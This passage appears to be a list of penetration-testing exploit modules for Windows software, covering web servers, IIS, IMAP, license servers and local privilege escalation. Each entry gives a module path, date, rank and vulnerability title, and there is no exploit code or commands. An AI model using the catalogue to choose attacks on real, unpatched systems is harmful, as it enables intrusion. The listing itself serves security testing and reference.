   windows/http/ektron_xslt_exec_ws                                  2015-02-05       excellent  Ektron 8.5, 8.7, 9.0 XSLT Transform Remote Code Execution
   windows/http/ericom_access_now_bof                                2014-06-02       normal     Ericom AccessNow Server Buffer Overflow
   windows/http/ezserver_http                                        2012-06-18       excellent  EZHomeTech EzServer Stack Buffer Overflow Vulnerability
   windows/http/fdm_auth_header                                      2009-02-02       great      Free Download Manager Remote Control Server Buffer Overflow
   windows/http/generic_http_dll_injection                           2015-03-04       manual     Generic Web Application DLL Injection
   windows/http/geutebrueck_gcore_x64_rce_bo                         2017-01-24       normal     Geutebrueck GCore - GCoreServer.exe Buffer Overflow RCE
   windows/http/hp_autopass_license_traversal                        2014-01-10       great      HP AutoPass License Server File Upload
   windows/http/hp_imc_bims_upload                                   2013-10-08       excellent  HP Intelligent Management Center BIMS UploadServlet Directory Traversal
   windows/http/hp_imc_mibfileupload                                 2013-03-07       great      HP Intelligent Management Center Arbitrary File Upload
   windows/http/hp_loadrunner_copyfiletoserver                       2013-10-30       excellent  HP LoadRunner EmulationAdmin Web Service Directory Traversal
   windows/http/hp_mpa_job_acct                                      2011-12-21       excellent  HP Managed Printing Administration jobAcct Remote Command Execution
   windows/http/hp_nnm_getnnmdata_hostname                           2010-05-11       great      HP OpenView Network Node Manager getnnmdata.exe (Hostname) CGI Buffer Overflow
   windows/http/hp_nnm_getnnmdata_icount                             2010-05-11       great      HP OpenView Network Node Manager getnnmdata.exe (ICount) CGI Buffer Overflow
   windows/http/hp_nnm_getnnmdata_maxage                             2010-05-11       great      HP OpenView Network Node Manager getnnmdata.exe (MaxAge) CGI Buffer Overflow
   windows/http/hp_nnm_nnmrptconfig_nameparams                       2011-01-10       normal     HP OpenView NNM nnmRptConfig nameParams Buffer Overflow
   windows/http/hp_nnm_nnmrptconfig_schdparams                       2011-01-10       normal     HP OpenView NNM nnmRptConfig.exe schdParams Buffer Overflow
   windows/http/hp_nnm_openview5                                     2007-12-06       great      HP OpenView Network Node Manager OpenView5.exe CGI Buffer Overflow
   windows/http/hp_nnm_ovalarm_lang                                  2009-12-09       great      HP OpenView Network Node Manager ovalarm.exe CGI Buffer Overflow
   windows/http/hp_nnm_ovas                                          2008-04-02       good       HP OpenView NNM 7.53, 7.51 OVAS.EXE Pre-Authentication Stack Buffer Overflow
   windows/http/hp_nnm_ovbuildpath_textfile                          2011-11-01       normal     HP OpenView Network Node Manager ov.dll _OVBuildPath Buffer Overflow
   windows/http/hp_nnm_ovwebhelp                                     2009-12-09       great      HP OpenView Network Node Manager OvWebHelp.exe CGI Buffer Overflow
   windows/http/hp_nnm_ovwebsnmpsrv_main                             2010-06-16       great      HP OpenView Network Node Manager ovwebsnmpsrv.exe main Buffer Overflow
   windows/http/hp_nnm_ovwebsnmpsrv_ovutil                           2010-06-16       great      HP OpenView Network Node Manager ovwebsnmpsrv.exe ovutil Buffer Overflow
   windows/http/hp_nnm_ovwebsnmpsrv_uro                              2010-06-08       great      HP OpenView Network Node Manager ovwebsnmpsrv.exe Unrecognized Option Buffer Overflow
   windows/http/hp_nnm_snmp                                          2009-12-09       great      HP OpenView Network Node Manager Snmp.exe CGI Buffer Overflow
   windows/http/hp_nnm_snmpviewer_actapp                             2010-05-11       great      HP OpenView Network Node Manager snmpviewer.exe Buffer Overflow
   windows/http/hp_nnm_toolbar_01                                    2009-01-07       great      HP OpenView Network Node Manager Toolbar.exe CGI Buffer Overflow
   windows/http/hp_nnm_toolbar_02                                    2009-01-21       normal     HP OpenView Network Node Manager Toolbar.exe CGI Cookie Handling Buffer Overflow
   windows/http/hp_nnm_webappmon_execvp                              2010-07-20       great      HP OpenView Network Node Manager execvp_nc Buffer Overflow
   windows/http/hp_nnm_webappmon_ovjavalocale                        2010-08-03       great      HP NNM CGI webappmon.exe OvJavaLocale Buffer Overflow
   windows/http/hp_openview_insight_backdoor                         2011-01-31       excellent  HP OpenView Performance Insight Server Backdoor Account Code Execution
   windows/http/hp_pcm_snac_update_certificates                      2013-09-09       excellent  HP ProCurve Manager SNAC UpdateCertificatesServlet File Upload
   windows/http/hp_pcm_snac_update_domain                            2013-09-09       excellent  HP ProCurve Manager SNAC UpdateDomainControllerServlet File Upload
   windows/http/hp_power_manager_filename                            2011-10-19       normal     HP Power Manager 'formExportDataLogs' Buffer Overflow
   windows/http/hp_power_manager_login                               2009-11-04       average    Hewlett-Packard Power Manager Administration Buffer Overflow
   windows/http/hp_sitescope_dns_tool                                2015-10-09       good       HP SiteScope DNS Tool Command Injection
   windows/http/hp_sitescope_runomagentcommand                       2013-07-29       manual     HP SiteScope Remote Code Execution
   windows/http/httpdx_handlepeer                                    2009-10-08       great      HTTPDX h_handlepeer() Function Buffer Overflow
   windows/http/httpdx_tolog_format                                  2009-11-17       great      HTTPDX tolog() Function Format String Vulnerability
   windows/http/ia_webmail                                           2003-11-03       average    IA WebMail 3.x Buffer Overflow
   windows/http/ibm_tivoli_endpoint_bof                              2011-05-31       good       IBM Tivoli Endpoint Manager POST Query Buffer Overflow
   windows/http/ibm_tpmfosd_overflow                                 2007-05-02       good       IBM TPM for OS Deployment 5.1.0.x rembo.exe Buffer Overflow
   windows/http/ibm_tsm_cad_header                                   2007-09-24       good       IBM Tivoli Storage Manager Express CAD Service Buffer Overflow
   windows/http/icecast_header                                       2004-09-28       great      Icecast Header Overwrite
   windows/http/integard_password_bof                                2010-09-07       great      Race River Integard Home/Pro LoginAdmin Password Stack Buffer Overflow
   windows/http/intersystems_cache                                   2009-09-29       great      InterSystems Cache UtilConfigHome.csp Argument Buffer Overflow
   windows/http/intrasrv_bof                                         2013-05-30       manual     Intrasrv 1.0 Buffer Overflow
   windows/http/ipswitch_wug_maincfgret                              2004-08-25       great      Ipswitch WhatsUp Gold 8.03 Buffer Overflow
   windows/http/jira_collector_traversal                             2014-02-26       normal     JIRA Issues Collector Directory Traversal
   windows/http/kaseya_uploader                                      2015-09-23       excellent  Kaseya VSA uploader.aspx Arbitrary File Upload
   windows/http/kaseya_uploadimage_file_upload                       2013-11-11       excellent  Kaseya uploadImage Arbitrary File Upload
   windows/http/kolibri_http                                         2010-12-26       good       Kolibri HTTP Server HEAD Buffer Overflow
   windows/http/landesk_thinkmanagement_upload_asp                   2012-02-15       excellent  LANDesk Lenovo ThinkManagement Console Remote Command Execution
   windows/http/lexmark_markvision_gfd_upload                        2014-12-09       excellent  Lexmark MarkVision Enterprise Arbitrary File Upload
   windows/http/mailenable_auth_header                               2005-04-24       great      MailEnable Authorization Header Buffer Overflow
   windows/http/manage_engine_opmanager_rce                          2015-09-14       manual     ManageEngine OpManager Remote Code Execution
   windows/http/manageengine_apps_mngr                               2011-04-08       average    ManageEngine Applications Manager Authenticated Code Execution
   windows/http/manageengine_connectionid_write                      2015-12-14       excellent  ManageEngine Desktop Central 9 FileUploadServlet ConnectionId Vulnerability
   windows/http/maxdb_webdbm_database                                2006-08-29       good       MaxDB WebDBM Database Parameter Overflow
   windows/http/maxdb_webdbm_get_overflow                            2005-04-26       good       MaxDB WebDBM GET Buffer Overflow
   windows/http/mcafee_epolicy_source                                2006-07-17       average    McAfee ePolicy Orchestrator / ProtectionPilot Overflow
   windows/http/mdaemon_worldclient_form2raw                         2003-12-29       great      MDaemon WorldClient form2raw.cgi Stack Buffer Overflow
   windows/http/minishare_get_overflow                               2004-11-07       average    Minishare 1.4.1 Buffer Overflow
   windows/http/miniweb_upload_wbem                                  2013-04-09       excellent  MiniWeb (Build 300) Arbitrary File Upload
   windows/http/navicopa_get_overflow                                2006-09-28       great      NaviCOPA 2.0.1 URL Handling Buffer Overflow
   windows/http/netdecision_http_bof                                 2012-02-24       normal     NetDecision 4.5.1 HTTP Server Buffer Overflow
   windows/http/netgear_nms_rce                                      2016-02-04       excellent  NETGEAR ProSafe Network Management System 300 Arbitrary File Upload
   windows/http/novell_imanager_upload                               2010-10-01       excellent  Novell iManager getMultiPartParameters Arbitrary File Upload
   windows/http/novell_mdm_lfi                                       2013-03-13       excellent  Novell Zenworks Mobile Managment MDM.php Local File Inclusion Vulnerability
   windows/http/novell_messenger_acceptlang                          2006-04-13       average    Novell Messenger Server 2.0 Accept-Language Overflow
   windows/http/nowsms                                               2008-02-19       good       Now SMS/MMS Gateway Buffer Overflow
   windows/http/octopusdeploy_deploy                                 2017-05-15       excellent  Octopus Deploy Authenticated Code Execution
   windows/http/oracle9i_xdb_pass                                    2003-08-18       great      Oracle 9i XDB HTTP PASS Overflow (win32)
   windows/http/oracle_beehive_evaluation                            2010-06-09       excellent  Oracle BeeHive 2 voice-servlet processEvaluation() Vulnerability
   windows/http/oracle_beehive_prepareaudiotoplay                    2015-11-10       excellent  Oracle BeeHive 2 voice-servlet prepareAudioToPlay() Arbitrary File Upload
   windows/http/oracle_btm_writetofile                               2012-08-07       excellent  Oracle Business Transaction Management FlashTunnelService Remote Code Execution
   windows/http/oracle_endeca_exec                                   2013-07-16       excellent  Oracle Endeca Server Remote Command Execution
   windows/http/oracle_event_processing_upload                       2014-04-21       excellent  Oracle Event Processing FileUploadServlet Arbitrary File Upload
   windows/http/osb_uname_jlist                                      2010-07-13       excellent  Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability
   windows/http/peercast_url                                         2006-03-08       average    PeerCast URL Handling Buffer Overflow
   windows/http/php_apache_request_headers_bof                       2012-05-08       normal     PHP apache_request_headers Function Buffer Overflow
   windows/http/privatewire_gateway                                  2006-06-26       average    Private Wire Gateway Buffer Overflow
   windows/http/psoproxy91_overflow                                  2004-02-20       average    PSO Proxy v0.91 Stack Buffer Overflow
   windows/http/rabidhamster_r4_log                                  2012-02-09       normal     RabidHamster R4 Log Entry sprintf() Buffer Overflow
   windows/http/rejetto_hfs_exec                                     2014-09-11       excellent  Rejetto HttpFileServer Remote Command Execution
   windows/http/sambar6_search_results                               2003-06-21       normal     Sambar 6 Search Results Buffer Overflow
   windows/http/sap_configservlet_exec_noauth                        2012-11-01       great      SAP ConfigServlet Remote Code Execution
   windows/http/sap_host_control_cmd_exec                            2012-08-14       average    SAP NetWeaver HostControl Command Injection
   windows/http/sapdb_webtools                                       2007-07-05       great      SAP DB 7.4 WebTools Buffer Overflow
   windows/http/savant_31_overflow                                   2002-09-10       great      Savant 3.1 Web Server Overflow
   windows/http/sepm_auth_bypass_rce                                 2015-07-31       excellent  Symantec Endpoint Protection Manager Authentication Bypass and Code Execution
   windows/http/serviio_checkstreamurl_cmd_exec                      2017-05-03       excellent  Serviio Media Server checkStreamUrl Command Execution
   windows/http/servu_session_cookie                                 2009-11-01       good       Rhinosoft Serv-U Session Cookie Buffer Overflow
   windows/http/shoutcast_format                                     2004-12-23       average    SHOUTcast DNAS/win32 1.9.4 File Request Format String Overflow
   windows/http/shttpd_post                                          2006-10-06       average    SHTTPD URI-Encoded POST Request Overflow
   windows/http/solarwinds_fsm_userlogin                             2015-03-13       excellent  Solarwinds Firewall Security Manager 6.6.5 Client Session Handling Vulnerability
   windows/http/solarwinds_storage_manager_sql                       2011-12-07       excellent  Solarwinds Storage Manager 5.1.0 SQL Injection
   windows/http/sonicwall_scrutinizer_sqli                           2012-07-22       excellent  Dell SonicWALL (Plixer) Scrutinizer 9 SQL Injection
   windows/http/steamcast_useragent                                  2008-01-24       average    Streamcast HTTP User-Agent Buffer Overflow
   windows/http/sws_connection_bof                                   2012-07-20       normal     Simple Web Server Connection Header Buffer Overflow
   windows/http/sybase_easerver                                      2005-07-25       average    Sybase EAServer 5.2 Remote Stack Buffer Overflow
   windows/http/syncbreeze_bof                                       2017-03-15       great      Sync Breeze Enterprise GET Buffer Overflow
   windows/http/sysax_create_folder                                  2012-07-29       normal     Sysax Multi Server 5.64 Create Folder Buffer Overflow
   windows/http/trackercam_phparg_overflow                           2005-02-18       average    TrackerCam PHP Argument Buffer Overflow
   windows/http/trackit_file_upload                                  2014-10-07       excellent  Numara / BMC Track-It! FileStorageService Arbitrary File Upload
   windows/http/trendmicro_officescan                                2007-06-28       good       Trend Micro OfficeScan Remote Stack Buffer Overflow
   windows/http/trendmicro_officescan_widget_exec                    2017-10-07       excellent  Trend Micro OfficeScan Remote Code Execution
   windows/http/ultraminihttp_bof                                    2013-07-10       normal     Ultra Mini HTTPD Stack Buffer Overflow
   windows/http/umbraco_upload_aspx                                  2012-06-28       excellent  Umbraco CMS Remote Command Execution
   windows/http/vmware_vcenter_chargeback_upload                     2013-05-15       excellent  VMware vCenter Chargeback Manager ImageUploadServlet Arbitrary File Upload
   windows/http/vxsrchs_bof                                          2017-03-15       great      VX Search Enterprise GET Buffer Overflow
   windows/http/webster_http                                         2002-12-02       average    Webster HTTP Server GET Buffer Overflow
   windows/http/xampp_webdav_upload_php                              2012-01-14       excellent  XAMPP WebDAV PHP Upload
   windows/http/xitami_if_mod_since                                  2007-09-24       average    Xitami 2.5c2 Web Server If-Modified-Since Overflow
   windows/http/zenworks_assetmgmt_uploadservlet                     2011-11-02       excellent  Novell ZENworks Asset Management Remote Execution
   windows/http/zenworks_uploadservlet                               2010-03-30       excellent  Novell ZENworks Configuration Management Remote Execution
   windows/iis/iis_webdav_scstoragepathfromurl                       2017-03-26       manual      Microsoft IIS WebDav ScStoragePathFromUrl Overflow
   windows/iis/iis_webdav_upload_asp                                 1994-01-01       excellent  Microsoft IIS WebDAV Write Access Code Execution
   windows/iis/ms01_023_printer                                      2001-05-01       good       MS01-023 Microsoft IIS 5.0 Printer Host Header Overflow
   windows/iis/ms01_026_dbldecode                                    2001-05-15       excellent  MS01-026 Microsoft IIS/PWS CGI Filename Double Decode Command Execution
   windows/iis/ms01_033_idq                                          2001-06-18       good       MS01-033 Microsoft IIS 5.0 IDQ Path Overflow
   windows/iis/ms02_018_htr                                          2002-04-10       good       MS02-018 Microsoft IIS 4.0 .HTR Path Overflow
   windows/iis/ms02_065_msadc                                        2002-11-20       normal     MS02-065 Microsoft IIS MDAC msadcs.dll RDS DataStub Content-Type Overflow
   windows/iis/ms03_007_ntdll_webdav                                 2003-05-30       great      MS03-007 Microsoft IIS 5.0 WebDAV ntdll.dll Path Overflow
   windows/iis/msadc                                                 1998-07-17       excellent  MS99-025 Microsoft IIS MDAC msadcs.dll RDS Arbitrary Remote Command Execution
   windows/imap/eudora_list                                          2005-12-20       great      Qualcomm WorldMail 3.0 IMAPD LIST Buffer Overflow
   windows/imap/imail_delete                                         2004-11-12       average    IMail IMAP4D Delete Overflow
   windows/imap/ipswitch_search                                      2007-07-18       average    Ipswitch IMail IMAP SEARCH Buffer Overflow
   windows/imap/mailenable_login                                     2006-12-11       great      MailEnable IMAPD (2.34/2.35) Login Request Buffer Overflow
   windows/imap/mailenable_status                                    2005-07-13       great      MailEnable IMAPD (1.54) STATUS Request Buffer Overflow
   windows/imap/mailenable_w3c_select                                2005-10-03       great      MailEnable IMAPD W3C Logging Buffer Overflow
   windows/imap/mdaemon_cram_md5                                     2004-11-12       great      Mdaemon 8.0.3 IMAPD CRAM-MD5 Authentication Overflow
   windows/imap/mdaemon_fetch                                        2008-03-13       great      MDaemon 9.6.4 IMAPD FETCH Buffer Overflow
   windows/imap/mercur_imap_select_overflow                          2006-03-17       average    Mercur v5.0 IMAP SP3 SELECT Buffer Overflow
   windows/imap/mercur_login                                         2006-03-17       average    Mercur Messaging 2005 IMAP Login Buffer Overflow
   windows/imap/mercury_login                                        2007-03-06       average    Mercury/32 LOGIN Buffer Overflow
   windows/imap/mercury_rename                                       2004-11-29       average    Mercury/32 v4.01a IMAP RENAME Buffer Overflow
   windows/imap/novell_netmail_append                                2006-12-23       average    Novell NetMail IMAP APPEND Buffer Overflow
   windows/imap/novell_netmail_auth                                  2007-01-07       average    Novell NetMail IMAP AUTHENTICATE Buffer Overflow
   windows/imap/novell_netmail_status                                2005-11-18       average    Novell NetMail IMAP STATUS Buffer Overflow
   windows/imap/novell_netmail_subscribe                             2006-12-23       average    Novell NetMail IMAP SUBSCRIBE Buffer Overflow
   windows/isapi/ms00_094_pbserver                                   2000-12-04       good       MS00-094 Microsoft IIS Phone Book Service Overflow
   windows/isapi/ms03_022_nsiislog_post                              2003-06-25       good       MS03-022 Microsoft IIS ISAPI nsiislog.dll ISAPI POST Overflow
   windows/isapi/ms03_051_fp30reg_chunked                            2003-11-11       good       MS03-051 Microsoft IIS ISAPI FrontPage fp30reg.dll Chunked Overflow
   windows/isapi/rsa_webagent_redirect                               2005-10-21       good       Microsoft IIS ISAPI RSA WebAgent Redirect Overflow
   windows/isapi/w3who_query                                         2004-12-06       good       Microsoft IIS ISAPI w3who.dll Query String Overflow
   windows/ldap/imail_thc                                            2004-02-17       average    IMail LDAP Service Buffer Overflow
   windows/ldap/pgp_keyserver7                                       2001-07-16       good       Network Associates PGP KeyServer 7 LDAP Buffer Overflow
   windows/license/calicclnt_getconfig                               2005-03-02       average    Computer Associates License Client GETCONFIG Overflow
   windows/license/calicserv_getconfig                               2005-03-02       normal     Computer Associates License Server GETCONFIG Overflow
   windows/license/flexnet_lmgrd_bof                                 2012-03-23       normal     FlexNet License Server Manager lmgrd Buffer Overflow
   windows/license/sentinel_lm7_udp                                  2005-03-07       average    SentinelLM UDP Buffer Overflow
   windows/local/adobe_sandbox_adobecollabsync                       2013-05-14       great      AdobeCollabSync Buffer Overflow Adobe Reader X Sandbox Bypass
   windows/local/agnitum_outpost_acs                                 2013-08-02       excellent  Agnitum Outpost Internet Security Local Privilege Escalation
   windows/local/always_install_elevated                             2010-03-18       excellent  Windows AlwaysInstallElevated MSI
   windows/local/applocker_bypass                                    2015-08-03       excellent  AppLocker Execution Prevention Bypass
   windows/local/ask                                                 2012-01-03       excellent  Windows Escalate UAC Execute RunAs
   windows/local/bthpan                                              2014-07-18       average    MS14-062 Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation
   windows/local/bypassuac                                           2010-12-31       excellent  Windows Escalate UAC Protection Bypass
   windows/local/bypassuac_comhijack                                 1900-01-01       excellent  Windows Escalate UAC Protection Bypass (Via COM Handler Hijack)
   windows/local/bypassuac_eventvwr                                  2016-08-15       excellent  Windows Escalate UAC Protection Bypass (Via Eventvwr Registry Key)
   windows/local/bypassuac_fodhelper                                 2017-05-12       excellent  Windows UAC Protection Bypass (Via FodHelper Registry Key)
   windows/local/bypassuac_injection                                 2010-12-31       excellent  Windows Escalate UAC Protection Bypass (In Memory Injection)
   windows/local/bypassuac_injection_winsxs                          2017-04-06       excellent  Windows Escalate UAC Protection Bypass (In Memory Injection) abusing WinSXS
   windows/local/bypassuac_vbs                                       2015-08-22       excellent  Windows Escalate UAC Protection Bypass (ScriptHost Vulnerability)
   windows/local/capcom_sys_exec                                     1999-01-01       normal     Windows Capcom.sys Kernel Execution Exploit (x64 only)
   windows/local/current_user_psexec                                 1999-01-01       excellent  PsExec via Current User Token
   windows/local/cve_2017_8464_lnk_lpe                               2017-06-13       excellent  LNK Code Execution Vulnerability
   windows/local/ikeext_service                                      2012-10-09       good       IKE and AuthIP IPsec Keyring Modules Service (IKEEXT) Missing DLL
   windows/local/ipass_launch_app                                    2015-03-12       excellent  iPass Mobile Client Service Privilege Escalation
   windows/local/lenovo_systemupdate                                 2015-04-12       excellent  Lenovo System Update Privilege Escalation
   windows/local/mqac_write                                          2014-07-22       average    MQAC.sys Arbitrary Write Privilege Escalation
   windows/local/ms10_015_kitrap0d                                   2010-01-19       great      Windows SYSTEM Escalation via KiTrap0D
   windows/local/ms10_092_schelevator                                2010-09-13       excellent  Windows Escalate Task Scheduler XML Privilege Escalation
   windows/local/ms11_080_afdjoinleaf                                2011-11-30       average    MS11-080 AfdJoinLeaf Privilege Escalation
   windows/local/ms13_005_hwnd_broadcast                             2012-11-27       excellent  MS13-005 HWND_BROADCAST Low to Medium Integrity Privilege Escalation
   windows/local/ms13_053_schlamperei                                2013-12-01       average    Windows NTUserMessageCall Win32k Kernel Pool Overflow (Schlamperei)
   windows/local/ms13_081_track_popup_menu                           2013-10-08       average    Windows TrackPopupMenuEx Win32k NULL Page
   windows/local/ms13_097_ie_registry_symlink                        2013-12-10       great      MS13-097 Registry Symlink IE Sandbox Escape
   windows/local/ms14_009_ie_dfsvc                                   2014-02-11       great      MS14-009 .NET Deployment Service IE Sandbox Escape
   windows/local/ms14_058_track_popup_menu                           2014-10-14       normal     Windows TrackPopupMenu Win32k NULL Pointer Dereference
   windows/local/ms14_070_tcpip_ioctl                                2014-11-11       average    MS14-070 Windows tcpip!SetAddrOptions NULL Pointer Dereference
   windows/local/ms15_004_tswbproxy                                  2015-01-13       good       MS15-004 Microsoft Remote Desktop Services Web Proxy IE Sandbox Escape
   windows/local/ms15_051_client_copy_image                          2015-05-12       normal     Windows ClientCopyImage Win32k Exploit
   windows/local/ms15_078_atmfd_bof                                  2015-07-11       manual     MS15-078 Microsoft Windows Font Driver Buffer Overflow
   windows/local/ms16_016_webdav                                     2016-02-09       excellent  MS16-016 mrxdav.sys WebDav Local Privilege Escalation
   windows/local/ms16_032_secondary_logon_handle_privesc             2016-03-21       normal     MS16-032 Secondary Logon Handle Privilege Escalation
   windows/local/ms_ndproxy                                          2013-11-27       average    MS14-002 Microsoft Windows ndproxy.sys Local Privilege Escalation
   windows/local/novell_client_nicm                                  2013-05-22       average    Novell Client 2 SP3 nicm.sys Local Privilege Escalation
   windows/local/novell_client_nwfs                                  2008-06-26       average    Novell Client 4.91 SP4 nwfs.sys Local Privilege Escalation
   windows/local/ntapphelpcachecontrol                               2014-09-30       normal     MS15-001 Microsoft Windows NtApphelpCacheControl Improper Authorization Check
   windows/local/nvidia_nvsvc                                        2012-12-25       average    Nvidia (nvsvc) Display Driver Service Local Privilege Escalation
   windows/local/panda_psevents                                      2016-06-27       excellent  Panda Security PSEvents Privilege Escalation
   windows/local/payload_inject                                      2011-10-12       excellent  Windows Manage Memory Payload Injection
   windows/local/persistence                                         2011-10-19       excellent  Windows Persistent Registry Startup Payload Installer
   windows/local/powershell_cmd_upgrade                              1999-01-01       excellent  Windows Command Shell Upgrade (Powershell)
   windows/local/powershell_remoting                                 1999-01-01       excellent  Powershell Remoting Remote Command Execution
   windows/local/ppr_flatten_rec                                     2013-05-15       average    Windows EPATHOBJ::pprFlattenRec Local Privilege Escalation
   windows/local/ps_persist                                          2012-08-14       excellent  Powershell Payload Execution
   windows/local/ps_wmi_exec                                         2012-08-19       excellent  Authenticated WMI Exec via Powershell
   windows/local/pxeexploit                                          2011-08-05       excellent  PXE Exploit Server
   windows/local/razer_zwopenprocess                                 2017-03-22       normal     Razer Synapse rzpnk.sys ZwOpenProcess
   windows/local/registry_persistence                                2015-07-01       excellent  Windows Registry Only Persistence
   windows/local/run_as                                              1999-01-01       excellent  Windows Run Command As User
   windows/local/s4u_persistence                                     2013-01-02       excellent  Windows Manage User Level Persistent Payload Installer
   windows/local/service_permissions                                 2012-10-15       great      Windows Escalate Service Permissions Local Privilege Escalation
   windows/local/trusted_service_path                                2001-10-25       excellent  Windows Service Trusted Path Privilege Escalation
   windows/local/virtual_box_guest_additions                         2014-07-15       average    VirtualBox Guest Additions VBoxGuest.sys Privilege Escalation
   windows/local/virtual_box_opengl_escape                           2014-03-11       average    VirtualBox 3D Acceleration Virtual Machine Escape
   windows/local/vss_persistence                                     2011-10-21       excellent  Persistent Payload in Windows Volume Shadow Copy
   windows/local/wmi                                                 1999-01-01       excellent  Windows Management Instrumentation (WMI) Remote Command Execution
   windows/local/wmi_persistence                                     2017-06-06       normal     WMI Event Subscription Persistence
   windows/lotus/domino_http_accept_language                         2008-05-20       average    IBM Lotus Domino Web Server Accept-Language Stack Buffer Overflow
   windows/lotus/domino_icalendar_organizer                          2010-09-14       normal     IBM Lotus Domino iCalendar MAILTO Buffer Overflow
   windows/lotus/domino_sametime_stmux                               2008-05-21       average    IBM Lotus Domino Sametime STMux.exe Stack Buffer Overflow
   windows/lotus/lotusnotes_lzh                                      2011-05-24       normal     Lotus Notes 8.0.x - 8.5.2 FP2 - Autonomy Keyview (.lzh Attachment)
   windows/lpd/hummingbird_exceed                                    2005-05-27       average    Hummingbird Connectivity 10 SP5 LPD Buffer Overflow
   windows/lpd/niprint                                               2003-11-05       good       NIPrint LPD Request Overflow
   windows/lpd/saplpd                                                2008-02-04       good       SAP SAPLPD 6.28 Buffer Overflow
   windows/lpd/wincomlpd_admin                                       2008-02-04       good       WinComLPD Buffer Overflow
   windows/misc/achat_bof                                            2014-12-18       normal     Achat Unicode SEH Buffer Overflow
   windows/misc/actfax_raw_server_bof                                2013-02-05       normal     ActFax 5.01 RAW Server Buffer Overflow
   windows/misc/agentxpp_receive_agentx                              2010-04-16       good       AgentX++ Master AgentX::receive_agentx Stack Buffer Overflow
   windows/misc/allmediaserver_bof                                   2012-07-04       normal     ALLMediaServer 0.8 Buffer Overflow
   windows/misc/altiris_ds_sqli                                      2008-05-15       normal     Symantec Altiris DS SQL Injection
   windows/misc/apple_quicktime_rtsp_response                        2007-11-23       normal     Apple QuickTime 7.3 RTSP Response Header Buffer Overflow
   windows/misc/asus_dpcproxy_overflow                               2008-03-21       average    Asus Dpcproxy Buffer Overflow
   windows/misc/avaya_winpmd_unihostrouter                           2011-05-23       normal     Avaya WinPMD UniteHostRouter Buffer Overflow
   windows/misc/avidphoneticindexer                                  2011-11-29       normal     Avid Media Composer 5.5 - Avid Phonetic Indexer Buffer Overflow
   windows/misc/bakbone_netvault_heap                                2005-04-01       average    BakBone NetVault Remote Heap Overflow
   windows/misc/bcaaa_bof                                            2011-04-04       good       Blue Coat Authentication and Authorization Agent (BCAAA) 5 Buffer Overflow
   windows/misc/bigant_server                                        2008-04-15       average    BigAnt Server 2.2 Buffer Overflow
   windows/misc/bigant_server_250                                    2008-04-15       great      BigAnt Server 2.50 SP1 Buffer Overflow
   windows/misc/bigant_server_dupf_upload                            2013-01-09       excellent  BigAnt Server DUPF Command Arbitrary File Upload
   windows/misc/bigant_server_sch_dupf_bof                           2013-01-09       normal     BigAnt Server 2 SCH And DUPF Buffer Overflow
   windows/misc/bigant_server_usv                                    2009-12-29       great      BigAnt Server 2.52 USV Buffer Overflow
   windows/misc/bomberclone_overflow                                 2006-02-16       average    Bomberclone 0.11.6 Buffer Overflow
   windows/misc/bopup_comm                                           2009-06-18       good       Bopup Communications Server Buffer Overflow
   windows/misc/borland_interbase                                    2007-07-24       average    Borland Interbase Create-Request Buffer Overflow
   windows/misc/borland_starteam                                     2008-04-02       average    Borland CaliberRM StarTeam Multicast Service Buffer Overflow
   windows/misc/citrix_streamprocess                                 2011-01-20       good       Citrix Provisioning Services 5.6 streamprocess.exe Buffer Overflow
   windows/misc/citrix_streamprocess_data_msg                        2011-11-04       normal     Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020000 Buffer Overflow
   windows/misc/citrix_streamprocess_get_boot_record_request         2011-11-04       normal     Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020004 Buffer Overflow
   windows/misc/citrix_streamprocess_get_footer                      2011-11-04       normal     Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020002 Buffer Overflow
   windows/misc/citrix_streamprocess_get_objects                     2011-11-04       normal     Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020006 Buffer Overflow
   windows/misc/doubletake                                           2008-06-04       average    DoubleTake/HP StorageWorks Storage Mirroring Service Authentication Overflow
   windows/misc/eiqnetworks_esa                                      2006-07-24       average    eIQNetworks ESA License Manager LICMGR_ADDLICENSE Overflow
   windows/misc/eiqnetworks_esa_topology                             2006-07-25       average    eIQNetworks ESA Topology DELETEDEVICE Overflow
   windows/misc/enterasys_netsight_syslog_bof                        2011-12-19       normal     Enterasys NetSight nssyslogd.exe Buffer Overflow
   windows/misc/eureka_mail_err                                      2009-10-22       normal     Eureka Email 2.2q ERR Remote Buffer Overflow
   windows/misc/fb_cnct_group                                        2013-01-31       normal     Firebird Relational Database CNCT Group Number Buffer Overflow
   windows/misc/fb_isc_attach_database                               2007-10-03       average    Firebird Relational Database isc_attach_database() Buffer Overflow
   windows/misc/fb_isc_create_database                               2007-10-03       average    Firebird Relational Database isc_create_database() Buffer Overflow
   windows/misc/fb_svc_attach                                        2007-10-03       average    Firebird Relational Database SVC_attach() Buffer Overflow
   windows/misc/gh0st                                                2017-07-27       normal     Gh0st Client buffer Overflow
   windows/misc/gimp_script_fu                                       2012-05-18       normal     GIMP script-fu Server Buffer Overflow
   windows/misc/hp_dataprotector_cmd_exec                            2014-11-02       excellent  HP Data Protector 8.10 Remote Command Execution
   windows/misc/hp_dataprotector_crs                                 2013-06-03       normal     HP Data Protector Cell Request Service Buffer Overflow
   windows/misc/hp_dataprotector_dtbclslogin                         2010-09-09       normal     HP Data Protector DtbClsLogin Buffer Overflow
   windows/misc/hp_dataprotector_encrypted_comms                     2016-04-18       normal     HP Data Protector Encrypted Communication Remote Command Execution
   windows/misc/hp_dataprotector_exec_bar                            2014-01-02       excellent  HP Data Protector Backup Client Service Remote Code Execution
   windows/misc/hp_dataprotector_install_service                     2011-11-02       excellent  HP Data Protector 6.10/6.11/6.20 Install Service
   windows/misc/hp_dataprotector_new_folder                          2012-03-12       normal     HP Data Protector Create New Folder Buffer Overflow
   windows/misc/hp_dataprotector_traversal                           2014-01-02       great      HP Data Protector Backup Client Service Directory Traversal
   windows/misc/hp_imc_uam                                           2012-08-29       normal     HP Intelligent Management Center UAM Buffer Overflow
   windows/misc/hp_loadrunner_magentproc                             2013-07-27       normal     HP LoadRunner magentproc.exe Overflow
   windows/misc/hp_magentservice                                     2012-01-12       average    HP Diagnostics Server magentservice.exe Overflow
   windows/misc/hp_omniinet_1                                        2009-12-17       great      HP OmniInet.exe MSG_PROTOCOL Buffer Overflow
   windows/misc/hp_omniinet_2                                        2009-12-17       great      HP OmniInet.exe MSG_PROTOCOL Buffer Overflow
